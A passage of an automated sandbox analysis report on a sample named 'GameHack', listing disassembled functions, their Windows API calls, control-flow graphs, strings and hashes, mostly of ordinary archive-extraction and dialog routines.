                                      • ExitProcess.KERNEL32 ref: 00EE0669
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                      • API String ID: 1201351596-3298887752
                                      • Opcode ID: 541a9cc66c4431133e46d1f2f1b73fdc4dcd2872976111bb764fc3ce3d94b034
                                      • Instruction ID: 65cbb365689c9cd500c5183cf518a46c2bdb327e96ddfa0e7e1fb830dbe1151b
                                      • Opcode Fuzzy Hash: 541a9cc66c4431133e46d1f2f1b73fdc4dcd2872976111bb764fc3ce3d94b034
                                      • Instruction Fuzzy Hash: CED173B11093889BD731DF51D849B9FBAECFB84708F00591DF685A6281D7B09648BB62
                                      Function 00EEBDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 406 eebdf5-eebe0d call eee28c call eee360 411 eebe13-eebe3d call eeaa36 406->411 412 eeca90-eeca9d 406->412 411->412 415 eebe43-eebe48 411->415 416 eebe49-eebe57 415->416 417 eebe58-eebe6d call eea6c7 416->417 420 eebe6f 417->420 421 eebe71-eebe86 call ee17ac 420->421 424 eebe88-eebe8c 421->424 425 eebe93-eebe96 421->425 424->421 426 eebe8e 424->426 427 eeca5c-eeca87 call eeaa36 425->427 428 eebe9c 425->428 426->427 427->416 442 eeca8d-eeca8f 427->442 430 eec074-eec076 428->430 431 eec115-eec117 428->431 432 eec132-eec134 428->432 433 eebea3-eebea6 428->433 430->427 435 eec07c-eec088 430->435 431->427 438 eec11d-eec12d SetWindowTextW 431->438 432->427 434 eec13a-eec141 432->434 433->427 437 eebeac-eebf06 call ee9da4 call edb965 call eda49d call eda5d7 call ed70bf 433->437 434->427 439 eec147-eec160 434->439 440 eec09c-eec0a1 435->440 441 eec08a-eec09b call ef7168 435->441 497 eec045-eec05a call eda52a 437->497 438->427 444 eec168-eec176 call ef35b3 439->444 445 eec162 439->445 448 eec0ab-eec0b6 call eeab9a 440->448 449 eec0a3-eec0a9 440->449 441->440 442->412 444->427 461 eec17c-eec185 444->461 445->444 453 eec0bb-eec0bd 448->453 449->453 458 eec0bf-eec0c6 call ef35b3 453->458 459 eec0c8-eec0e8 call ef35b3 call ef35de 453->459 458->459 480 eec0ea-eec0f1 459->480 481 eec101-eec103 459->481 465 eec1ae-eec1b1 461->465 466 eec187-eec18b 461->466 472 eec296-eec2a4 call edfe56 465->472 473 eec1b7-eec1ba 465->473 466->465 470 eec18d-eec195 466->470 470->427 476 eec19b-eec1a9 call edfe56 470->476 489 eec2a6-eec2ba call ef17cb 472->489 478 eec1bc-eec1c1 473->478 479 eec1c7-eec1e2 473->479 476->489 478->472 478->479 492 eec22c-eec233 479->492 493 eec1e4-eec21e 479->493 486 eec0f8-eec100 call ef7168 480->486 487 eec0f3-eec0f5 480->487 481->427 488 eec109-eec110 call ef35ce 481->488 486->481 487->486 488->427 507 eec2bc-eec2c0 489->507 508 eec2c7-eec318 call edfe56 call eea8d0 GetDlgItem SetWindowTextW SendMessageW call ef35e9 489->508 499 eec235-eec24d call ef35b3 492->499 500 eec261-eec284 call ef35b3 * 2 492->500 528 eec222-eec224 493->528 529 eec220 493->529 514 eebf0b-eebf1f SetFileAttributesW 497->514 515 eec060-eec06f call eda4b3 497->515 499->500 522 eec24f-eec25c call edfe2e 499->522 500->489 534 eec286-eec294 call edfe2e 500->534 507->508 513 eec2c2-eec2c4 507->513 540 eec31d-eec321 508->540 513->508 516 eebfc5-eebfd5 GetFileAttributesW 514->516 517 eebf25-eebf58 call edb4f7 call edb207 call ef35b3 514->517 515->427 516->497 526 eebfd7-eebfe6 DeleteFileW 516->526 549 eebf5a-eebf69 call ef35b3 517->549 550 eebf6b-eebf79 call edb925 517->550 522->500 526->497 533 eebfe8-eebfeb 526->533 528->492 529->528 537 eebfef-eec01b call ed400a GetFileAttributesW 533->537 534->489 547 eebfed-eebfee 537->547 548 eec01d-eec033 MoveFileW 537->548 540->427 544 eec327-eec33b SendMessageW 540->544 544->427 547->537 548->497 551 eec035-eec03f MoveFileExW 548->551 549->550 556 eebf7f-eebfbe call ef35b3 call eef350 549->556 550->515 550->556 551->497 556->516
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00EEBDFA
                                        • Part of subcall function 00EEAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00EEAAFE
                                      • SetWindowTextW.USER32(?,?), ref: 00EEC127
                                      • _wcsrchr.LIBVCRUNTIME ref: 00EEC2B1
                                      • GetDlgItem.USER32(?,00000066), ref: 00EEC2EC
                                      • SetWindowTextW.USER32(00000000,?), ref: 00EEC2FC
                                      • SendMessageW.USER32(00000000,00000143,00000000,00F1A472), ref: 00EEC30A
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EEC335
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                      • API String ID: 3564274579-312220925
                                      • Opcode ID: bb8ad0ccd64ebab9ad9c2b9bc7cb40d629d7fcb07bc067558dbd53c9b5ad47b7
                                      • Instruction ID: bae3955e988ff50fb791a50d1ddd66f492a1a3e4e042499f284b580a7f304ea9
                                      • Opcode Fuzzy Hash: bb8ad0ccd64ebab9ad9c2b9bc7cb40d629d7fcb07bc067558dbd53c9b5ad47b7
                                      • Instruction Fuzzy Hash: 85E18F72D0465CAADB25EBA1DC45DEF73BCEF08314F1050A6F609F31A1EB709A859B50
                                      Function 00EDD341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 561 edd341-edd378 call eee28c call eee360 call ef15e8 568 edd3ab-edd3b4 call edfe56 561->568 569 edd37a-edd3a9 GetModuleFileNameW call edbc85 call edfe2e 561->569 573 edd3b9-edd3dd call ed9619 call ed99b0 568->573 569->573 580 edd7a0-edd7a6 call ed9653 573->580 581 edd3e3-edd3eb 573->581 586 edd7ab-edd7bb 580->586 583 edd3ed-edd405 call ee3781 * 2 581->583 584 edd409-edd438 call ef5a90 * 2 581->584 594 edd407 583->594 595 edd43b-edd43e 584->595 594->584 596 edd56c-edd58f call ed9d30 call ef35d3 595->596 597 edd444-edd44a call ed9e40 595->597 596->580 606 edd595-edd5b0 call ed9bf0 596->606 601 edd44f-edd476 call ed9bf0 597->601 607 edd47c-edd484 601->607 608 edd535-edd538 601->608 618 edd5b9-edd5cc call ef35d3 606->618 619 edd5b2-edd5b7 606->619 609 edd4af-edd4ba 607->609 610 edd486-edd48e 607->610 611 edd53b-edd55d call ed9d30 608->611 615 edd4bc-edd4c8 609->615 616 edd4e5-edd4ed 609->616 610->609 614 edd490-edd4aa call ef5ec0 610->614 611->595 630 edd563-edd566 611->630 633 edd4ac 614->633 634 edd52b-edd533 614->634 615->616 621 edd4ca-edd4cf 615->621 623 edd4ef-edd4f7 616->623 624 edd519-edd51d 616->624 618->580 639 edd5d2-edd5ee call ee137a call ef35ce 618->639 626 edd5f1-edd5f8 619->626 621->616 629 edd4d1-edd4e3 call ef5808 621->629 623->624 631 edd4f9-edd513 call ef5ec0 623->631 624->608 625 edd51f-edd522 624->625 625->607 636 edd5fc-edd625 call edfdfb call ef35d3 626->636 637 edd5fa 626->637 629->616 644 edd527 629->644 630->580 630->596 631->580 631->624 633->609 634->611 650 edd627-edd62e call ef35ce 636->650 651 edd633-edd649 636->651 637->636 639->626 644->634 650->580 654 edd64f-edd65d 651->654 655 edd731-edd757 call edce72 call ef35ce * 2 651->655 657 edd664-edd669 654->657 686 edd759-edd76f call ee3781 * 2 655->686 687 edd771-edd79d call ef5a90 * 2 655->687 659 edd97c-edd984 657->659 660 edd66f-edd678 657->660 664 edd72b-edd72e 659->664 665 edd98a-edd98e 659->665 662 edd67a-edd67e 660->662 663 edd684-edd68b 660->663 662->659 662->663 667 edd691-edd6b6 663->667 668 edd880-edd891 call edfcbf 663->668 664->655 669 edd9de-edd9e4 665->669 670 edd990-edd996 665->670 675 edd6b9-edd6de call ef35b3 call ef5808 667->675 688 edd897-edd8c0 call edfe56 call ef5885 668->688 689 edd976-edd979 668->689 673 edda0a-edda2a call edce72 669->673 674 edd9e6-edd9ec 669->674 676 edd99c-edd9a3 670->676 677 edd722-edd725 670->677 696 edda02-edda05 673->696 674->673 681 edd9ee-edd9f4 674->681 709 edd6f6 675->709 710 edd6e0-edd6ea 675->710 684 edd9ca 676->684 685 edd9a5-edd9a8 676->685 677->657 677->664 681->677 691 edd9fa-edda01 681->691 690 edd9cc-edd9d9 684->690 694 edd9aa-edd9ad 685->694 695 edd9c6-edd9c8 685->695 686->687 687->580 688->689 721 edd8c6-edd93c call ee1596 call edfdfb call edfdd4 call edfdfb call ef58d9 688->721 689->659 690->677 691->696 697 edd9af-edd9b2 694->697 698 edd9c2-edd9c4 694->698 695->690 703 edd9be-edd9c0 697->703 704 edd9b4-edd9b8 697->704 698->690 703->690 704->681 711 edd9ba-edd9bc 704->711 716 edd6f9-edd6fd 709->716 710->709 715 edd6ec-edd6f4 710->715 711->690 715->716 716->675 720 edd6ff-edd706 716->720 722 edd70c-edd71a call edfdfb 720->722 723 edd7be-edd7c1 720->723 754 edd93e-edd947 721->754 755 edd94a-edd95f 721->755 730 edd71f 722->730 723->668 727 edd7c7-edd7ce 723->727 728 edd7d6-edd7d7 727->728 729 edd7d0-edd7d4 727->729 728->727 729->728 732 edd7d9-edd7e7 729->732 730->677 734 edd7e9-edd7ec 732->734 735 edd808-edd830 call ee1596 732->735 737 edd7ee-edd803 734->737 738 edd805 734->738 744 edd853-edd85b 735->744 745 edd832-edd84e call ef35e9 735->745 737->734 737->738 738->735 748 edd85d 744->748 749 edd862-edd87b call eddd6b 744->749 745->730 748->749 749->730 754->755 756 edd960-edd967 755->756 757 edd969-edd96d 756->757 758 edd973-edd974 756->758 757->730 757->758 758->756
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00EDD346
                                      • _wcschr.LIBVCRUNTIME ref: 00EDD367
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00EDD328,?), ref: 00EDD382
                                      • __fprintf_l.LIBCMT ref: 00EDD873
                                        • Part of subcall function 00EE137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00EDB652,00000000,?,?,?,00010486), ref: 00EE1396
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                      • API String ID: 4184910265-980926923
                                      • Opcode ID: 80e3c148643190e77eb1502dfc65c3c0dc8e21d16ffc8210620b36b91d289b77
                                      • Instruction ID: 98bb698e92263897b41774d26265325d8373a6ba55a242ba6147ab1cfebd943b
                                      • Opcode Fuzzy Hash: 80e3c148643190e77eb1502dfc65c3c0dc8e21d16ffc8210620b36b91d289b77
                                      • Instruction Fuzzy Hash: FB12C1719042199ACF24DFA4DC81BEEB7B9EF44304F10656BF616B7381EB719A42CB60
                                      Function 00EECB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00EEAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EEAC85
                                        • Part of subcall function 00EEAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEAC96
                                        • Part of subcall function 00EEAC74: IsDialogMessageW.USER32(00010486,?), ref: 00EEACAA
                                        • Part of subcall function 00EEAC74: TranslateMessage.USER32(?), ref: 00EEACB8
                                        • Part of subcall function 00EEAC74: DispatchMessageW.USER32(?), ref: 00EEACC2
                                      • GetDlgItem.USER32(00000068,00F2ECB0), ref: 00EECB6E
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00EEA632,00000001,?,?,00EEAECB,00F04F88,00F2ECB0), ref: 00EECB96
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00EECBA1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00F035B4), ref: 00EECBAF
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EECBC5
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00EECBDF
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EECC23
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00EECC31
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EECC40
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EECC67
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00F0431C), ref: 00EECC76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: 66a404063b8d7a768ec73458d41a3e53c3f5fbbad6b25a60834300bfc8472b62
                                      • Instruction ID: 983035121d8146c2ba414fabe2ae39a1644777efac7a909606cf854d8b98026c
                                      • Opcode Fuzzy Hash: 66a404063b8d7a768ec73458d41a3e53c3f5fbbad6b25a60834300bfc8472b62
                                      • Instruction Fuzzy Hash: 2A3104B1188349BFE301DF20DC4AFAB7FADEB82714F000508F65096191DB645A09EB76
                                      Function 00EE9E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 770 ee9e1c-ee9e38 FindResourceW 771 ee9e3e-ee9e50 SizeofResource 770->771 772 ee9f2f-ee9f32 770->772 773 ee9e52-ee9e61 LoadResource 771->773 774 ee9e70-ee9e72 771->774 773->774 775 ee9e63-ee9e6e LockResource 773->775 776 ee9f2e 774->776 775->774 777 ee9e77-ee9e8c GlobalAlloc 775->777 776->772 778 ee9f28-ee9f2d 777->778 779 ee9e92-ee9e9b GlobalLock 777->779 778->776 780 ee9f21-ee9f22 GlobalFree 779->780 781 ee9ea1-ee9ebf call eef4b0 CreateStreamOnHGlobal 779->781 780->778 784 ee9f1a-ee9f1b GlobalUnlock 781->784 785 ee9ec1-ee9ee3 call ee9d7b 781->785 784->780 785->784 790 ee9ee5-ee9eed 785->790 791 ee9eef-ee9f03 GdipCreateHBITMAPFromBitmap 790->791 792 ee9f08-ee9f16 790->792 791->792 793 ee9f05 791->793 792->784 793->792
                                      APIs
                                      • FindResourceW.KERNEL32(00EEAE4D,PNG,?,?,?,00EEAE4D,00000066), ref: 00EE9E2E
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E46
                                      • LoadResource.KERNEL32(00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E59
                                      • LockResource.KERNEL32(00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E64
                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00EEAE4D,00000066), ref: 00EE9E82
                                      • GlobalLock.KERNEL32(00000000), ref: 00EE9E93
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00EE9EB7
                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00EE9EFC
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EE9F1B
                                      • GlobalFree.KERNEL32(00000000), ref: 00EE9F22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                      • String ID: PNG
                                      • API String ID: 3656887471-364855578
                                      • Opcode ID: e23def08e0a9764704139a8a5401efbe2d3af51d428d98ab30f2a6114d346a6a
                                      • Instruction ID: e0c032314b2cb136ded503a44abd25240ddd5ed0ec0ea0decd492517ac47a6de
                                      • Opcode Fuzzy Hash: e23def08e0a9764704139a8a5401efbe2d3af51d428d98ab30f2a6114d346a6a
                                      • Instruction Fuzzy Hash: 5A318F7160435AABC7109F22DC4896BBBEDFF89755B044518F902E3262EB71DC00EBA1
                                      Function 00EECE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 795 eece22-eece3a call eee360 798 eed08b-eed093 795->798 799 eece40-eece4c call ef35b3 795->799 799->798 802 eece52-eece7a call eef350 799->802 805 eece7c 802->805 806 eece84-eece91 802->806 805->806 807 eece95-eece9e 806->807 808 eece93 806->808 809 eeced6 807->809 810 eecea0-eecea2 807->810 808->807 811 eeceda-eecedd 809->811 812 eeceaa-eecead 810->812 813 eecedf-eecee2 811->813 814 eecee4-eecee6 811->814 815 eed03c-eed041 812->815 816 eeceb3-eecebb 812->816 813->814 819 eecef9-eecf0e call edb493 813->819 814->819 820 eecee8-eeceef 814->820 817 eed036-eed03a 815->817 818 eed043 815->818 821 eed055-eed05d 816->821 822 eecec1-eecec7 816->822 817->815 823 eed048-eed04c 817->823 818->823 830 eecf27-eecf32 call eda180 819->830 831 eecf10-eecf1d call ee17ac 819->831 820->819 825 eecef1 820->825 826 eed05f-eed061 821->826 827 eed065-eed06d 821->827 822->821 824 eececd-eeced4 822->824 823->821 824->809 824->812 825->819 826->827 827->811 836 eecf4f-eecf5c ShellExecuteExW 830->836 837 eecf34-eecf4b call edb239 830->837 831->830 838 eecf1f 831->838 840 eed08a 836->840 841 eecf62-eecf6f 836->841 837->836 838->830 840->798 843 eecf82-eecf84 841->843 844 eecf71-eecf78 841->844 846 eecf9b-eecfba call eed2e6 843->846 847 eecf86-eecf8f 843->847 844->843 845 eecf7a-eecf80 844->845 845->843 848 eecff1-eecffd CloseHandle 845->848 846->848 862 eecfbc-eecfc4 846->862 847->846 857 eecf91-eecf99 ShowWindow 847->857 849 eed00e-eed01c 848->849 850 eecfff-eed00c call ee17ac 848->850 855 eed01e-eed020 849->855 856 eed079-eed07b 849->856 850->849 863 eed072 850->863 855->856 861 eed022-eed028 855->861 856->840 860 eed07d-eed07f 856->860 857->846 860->840 864 eed081-eed084 ShowWindow 860->864 861->856 865 eed02a-eed034 861->865 862->848 866 eecfc6-eecfd7 GetExitCodeProcess 862->866 863->856 864->840 865->856 866->848 867 eecfd9-eecfe3 866->867 868 eecfea 867->868 869 eecfe5 867->869 868->848 869->868
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 00EECF54
                                      • ShowWindow.USER32(?,00000000), ref: 00EECF93
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00EECFCF
                                      • CloseHandle.KERNEL32(?), ref: 00EECFF5
                                      • ShowWindow.USER32(?,00000001), ref: 00EED084
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                      • String ID: $.exe$.inf
                                      • API String ID: 3686203788-2452507128
                                      • Opcode ID: 28070d417fba79b127f7c7ef5162515fbda216ce040e882f21b743eb082d3c43
                                      • Instruction ID: 6e7adc13fe74a8bcd37e7a293ad45de6a464f1ac1e2172c09ded95ef054c0a27
                                      • Opcode Fuzzy Hash: 28070d417fba79b127f7c7ef5162515fbda216ce040e882f21b743eb082d3c43
                                      • Instruction Fuzzy Hash: 1C6117715083C89AD731DF66D8006BB7BEAEF85308F18681EF5C0B7260D7B18986DB52
                                      Function 00EFA058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 870 efa058-efa071 871 efa087-efa08c 870->871 872 efa073-efa083 call efe6ed 870->872 873 efa08e-efa096 871->873 874 efa099-efa0bd MultiByteToWideChar 871->874 872->871 882 efa085 872->882 873->874 876 efa0c3-efa0cf 874->876 877 efa250-efa263 call eeec4a 874->877 879 efa123 876->879 880 efa0d1-efa0e2 876->880 886 efa125-efa127 879->886 883 efa0e4-efa0f3 call f01a30 880->883 884 efa101-efa112 call ef8518 880->884 882->871 888 efa245 883->888 897 efa0f9-efa0ff 883->897 884->888 898 efa118 884->898 887 efa12d-efa140 MultiByteToWideChar 886->887 886->888 887->888 891 efa146-efa158 call efa72c 887->891 892 efa247-efa24e call efa2c0 888->892 899 efa15d-efa161 891->899 892->877 901 efa11e-efa121 897->901 898->901 899->888 902 efa167-efa16e 899->902 901->886 903 efa1a8-efa1b4 902->903 904 efa170-efa175 902->904 906 efa1b6-efa1c7 903->906 907 efa200 903->907 904->892 905 efa17b-efa17d 904->905 905->888 908 efa183-efa19d call efa72c 905->908 910 efa1c9-efa1d8 call f01a30 906->910 911 efa1e2-efa1f3 call ef8518 906->911 909 efa202-efa204 907->909 908->892 925 efa1a3 908->925 914 efa23e-efa244 call efa2c0 909->914 915 efa206-efa21f call efa72c 909->915 910->914 923 efa1da-efa1e0 910->923 911->914 924 efa1f5 911->924 914->888 915->914 928 efa221-efa228 915->928 927 efa1fb-efa1fe 923->927 924->927 925->888 927->909 929 efa22a-efa22b 928->929 930 efa264-efa26a 928->930 931 efa22c-efa23c WideCharToMultiByte 929->931 930->931 931->914 932 efa26c-efa273 call efa2c0 931->932 932->892
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00EF4E35,00EF4E35,?,?,?,00EFA2A9,00000001,00000001,3FE85006), ref: 00EFA0B2
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00EFA2A9,00000001,00000001,3FE85006,?,?,?), ref: 00EFA138
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EFA232
                                      • __freea.LIBCMT ref: 00EFA23F
                                        • Part of subcall function 00EF8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      • __freea.LIBCMT ref: 00EFA248
                                      • __freea.LIBCMT ref: 00EFA26D
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 7a7a75b611660a70d136c78811cf4831633235530e421ce66d3bf4731876eb23
